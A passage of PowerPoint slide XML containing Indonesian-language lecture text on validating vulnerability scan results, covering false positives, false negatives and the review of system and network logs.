              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar-benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghabiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneliti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>positif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengabaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waspada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>negatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditanggulangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> vendor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengingat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikompilasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, plugin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meniru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberhasilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peretas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terampil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertekad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rasa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Memeriksa log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Windows, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> label </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stabil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
